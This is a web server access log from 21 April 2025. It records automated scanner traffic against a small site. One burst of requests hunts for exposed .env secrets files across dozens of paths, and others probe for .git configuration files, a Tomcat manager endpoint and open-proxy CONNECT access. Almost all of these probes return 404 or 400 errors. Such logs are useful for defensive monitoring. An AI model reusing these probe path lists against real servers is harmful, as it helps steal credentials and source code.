194.164.107.5 - - [21/Apr/2025:14:33:00 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
154.81.156.54 - - [21/Apr/2025:14:38:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.70.87 - - [21/Apr/2025:14:54:49 +0200] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)"
154.81.156.54 - - [21/Apr/2025:15:04:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:15:12:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.51 - - [21/Apr/2025:15:32:33 +0200] "CONNECT ipv4.icanhazip.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
43.134.141.244 - - [21/Apr/2025:15:37:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [21/Apr/2025:15:47:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.241.183.89 - - [21/Apr/2025:15:47:49 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
40.78.61.105 - - [21/Apr/2025:15:54:16 +0200] "GET echo -e" 400 383 "-" "-"
206.168.34.56 - - [21/Apr/2025:16:02:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.56 - - [21/Apr/2025:16:03:01 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.56 - - [21/Apr/2025:16:03:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.56 - - [21/Apr/2025:16:03:06 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
206.168.34.56 - - [21/Apr/2025:16:03:21 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.56 - - [21/Apr/2025:16:03:22 +0200] "\x16\x03\x01" 400 383 "-" "-"
185.255.122.19 - - [21/Apr/2025:16:03:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.178 - - [21/Apr/2025:16:07:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.178 - - [21/Apr/2025:16:07:26 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.178 - - [21/Apr/2025:16:07:28 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.178 - - [21/Apr/2025:16:07:29 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.138.178 - - [21/Apr/2025:16:07:33 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.178 - - [21/Apr/2025:16:07:37 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:16:08:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [21/Apr/2025:16:09:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.150 - - [21/Apr/2025:16:12:47 +0200] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.179 - - [21/Apr/2025:16:14:05 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; U; Android 4.3.1; en-us; GT-I9100 Build/JLS36I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 CyanogenMod/10.2/i9100"
78.153.140.179 - - [21/Apr/2025:16:14:05 +0200] "GET /Dev/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.0.5) Gecko/2008123017 Firefox/3.0.5"
78.153.140.179 - - [21/Apr/2025:16:14:06 +0200] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.179 - - [21/Apr/2025:16:14:06 +0200] "GET /secrets.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:36.0) Gecko/20100101 Firefox/36.0"
78.153.140.179 - - [21/Apr/2025:16:14:07 +0200] "GET /test/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; es-us; GT-P3113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.179 - - [21/Apr/2025:16:14:07 +0200] "GET /blogs/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102704 Fedora/3.0.15-1.fc10 Firefox/3.0.15"
78.153.140.179 - - [21/Apr/2025:16:14:07 +0200] "GET /client/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (iPad; CPU OS 10_0 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/49.0.2623.109 Mobile/14A5335b Safari/601.1.46"
78.153.140.179 - - [21/Apr/2025:16:14:08 +0200] "GET /templates/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Linux; Android 6.0.1; 5056N Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:08 +0200] "GET /saas/.env HTTP/1.1" 404 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.153.140.179 - - [21/Apr/2025:16:14:08 +0200] "GET /content/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
78.153.140.179 - - [21/Apr/2025:16:14:09 +0200] "GET /old/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:10 +0200] "GET /.gitlab-ci/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0"
78.153.140.179 - - [21/Apr/2025:16:14:10 +0200] "GET /docker/.env HTTP/1.1" 404 356 "-" "Opera/8.0 (X11; Linux i686; U; cs)"
78.153.140.179 - - [21/Apr/2025:16:14:13 +0200] "GET /etc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0"
78.153.140.179 - - [21/Apr/2025:16:14:13 +0200] "GET /alpha/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /basic-network/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /configurations/.env HTTP/1.1" 404 364 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS; A7F)"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /core/database/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-J730GM Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /cpresources/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; ZTE N9120 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /env_variables.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /extension/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; GT-I9100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /functions/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:14 +0200] "GET /javascript/.env HTTP/1.1" 404 360 "-" "Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.10.229 Version/11.64"
78.153.140.179 - - [21/Apr/2025:16:14:15 +0200] "GET /laravel/public/.env HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3"
78.153.140.179 - - [21/Apr/2025:16:14:15 +0200] "GET /newsite/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG-SM-T337A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:15 +0200] "GET /node_modules/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13"
78.153.140.179 - - [21/Apr/2025:16:14:16 +0200] "GET /owncloud/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre"
78.153.140.179 - - [21/Apr/2025:16:14:18 +0200] "GET /packages/web/.env HTTP/1.1" 404 362 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)"
78.153.140.179 - - [21/Apr/2025:16:14:18 +0200] "GET /pemerintah/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (iPod; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/3A101a Safari/419.3"
78.153.140.179 - - [21/Apr/2025:16:14:18 +0200] "GET /portal2/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:18 +0200] "GET /registration/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:19 +0200] "GET /site-library/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
78.153.140.179 - - [21/Apr/2025:16:14:19 +0200] "GET /spearmint/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Linux;u;Android 2.3.7;zh-cn;) AppleWebKit/533.1 (KHTML,like Gecko) Version/4.0 Mobile Safari/533.1 (compatible; +http://www.baidu.com/search/spider.html)"
78.153.140.179 - - [21/Apr/2025:16:14:19 +0200] "GET /src/main/front-end/.env HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
78.153.140.179 - - [21/Apr/2025:16:14:20 +0200] "GET /stylesheets/.env HTTP/1.1" 404 361 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
78.153.140.179 - - [21/Apr/2025:16:14:20 +0200] "GET /user-config.json HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9) Gecko/2008061017 Firefox/3.0"
78.153.140.179 - - [21/Apr/2025:16:14:20 +0200] "GET /web-dist/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36"
78.153.140.179 - - [21/Apr/2025:16:14:21 +0200] "GET /webstatic/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20061113 Firefox/1.0.4 (Debian package 1.0.4-2sarge13)"
154.81.156.54 - - [21/Apr/2025:16:25:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [21/Apr/2025:16:29:02 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.255.122.19 - - [21/Apr/2025:16:29:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:16:35:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [21/Apr/2025:16:35:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [21/Apr/2025:16:36:50 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Python/3.7 aiohttp/3.8.1"
196.251.87.34 - - [21/Apr/2025:16:45:35 +0200] "GET /.env HTTP/1.1" 404 280 "-" "portalmmm/2.0 N410i(c20;TB)"
141.98.11.83 - - [21/Apr/2025:16:53:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:16:56:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [21/Apr/2025:16:57:31 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
154.81.156.54 - - [21/Apr/2025:17:19:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:17:30:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:17:35:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.75.212.115 - - [21/Apr/2025:17:54:50 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
195.211.191.170 - - [21/Apr/2025:18:00:38 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8"
154.81.156.54 - - [21/Apr/2025:18:04:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
57.129.64.237 - - [21/Apr/2025:18:19:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
154.81.156.54 - - [21/Apr/2025:18:24:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
170.106.160.90 - - [21/Apr/2025:18:24:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
80.82.77.202 - - [21/Apr/2025:18:38:05 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
5.183.209.244 - - [21/Apr/2025:18:43:05 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.255.122.19 - - [21/Apr/2025:18:46:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:18:49:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.181.149.142 - - [21/Apr/2025:18:52:22 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
71.6.232.20 - - [21/Apr/2025:19:04:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
88.214.25.122 - - [21/Apr/2025:19:05:54 +0200] "\x03" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:19:09:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:19:25:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [21/Apr/2025:19:28:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.226 - - [21/Apr/2025:19:31:40 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Safari/537.36"
185.255.122.19 - - [21/Apr/2025:19:46:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:19:52:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [21/Apr/2025:20:11:47 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
154.81.156.54 - - [21/Apr/2025:20:16:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:20:25:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.211.191.76 - - [21/Apr/2025:20:29:02 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36"
135.119.16.122 - - [21/Apr/2025:20:42:41 +0200] "GET /manager/text/list HTTP/1.1" 404 289 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [21/Apr/2025:20:47:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [21/Apr/2025:20:59:52 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
154.81.156.54 - - [21/Apr/2025:21:10:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.70.139 - - [21/Apr/2025:21:16:53 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.255.122.19 - - [21/Apr/2025:21:24:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.63.197.92 - - [21/Apr/2025:21:25:30 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:21:27:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [21/Apr/2025:21:40:10 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [21/Apr/2025:21:57:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.70.87 - - [21/Apr/2025:22:02:19 +0200] "GET /.git/HEAD HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36"
141.98.11.226 - - [21/Apr/2025:22:02:28 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Safari/537.36"
154.81.156.54 - - [21/Apr/2025:22:11:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.17 - - [21/Apr/2025:22:20:28 +0200] "CONNECT example.com:80 HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [21/Apr/2025:22:35:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:22:38:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.243.61 - - [21/Apr/2025:22:43:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
203.15.155.155 - - [21/Apr/2025:22:43:30 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
112.46.217.56 - - [21/Apr/2025:22:48:51 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
185.218.86.4 - - [21/Apr/2025:22:52:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.91 - - [21/Apr/2025:23:07:55 +0200] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.91 - - [21/Apr/2025:23:07:55 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:23:17:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.234.115.86 - - [21/Apr/2025:23:28:28 +0200] "GET / HTTP/1.0" 200 423 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.86 - - [21/Apr/2025:23:28:40 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.234.115.86 - - [21/Apr/2025:23:29:10 +0200] "GET / HTTP/1.1" 200 274 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
185.255.122.19 - - [21/Apr/2025:23:29:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.234.115.86 - - [21/Apr/2025:23:31:47 +0200] "\x16\x03\x01" 400 383 "-" "-"
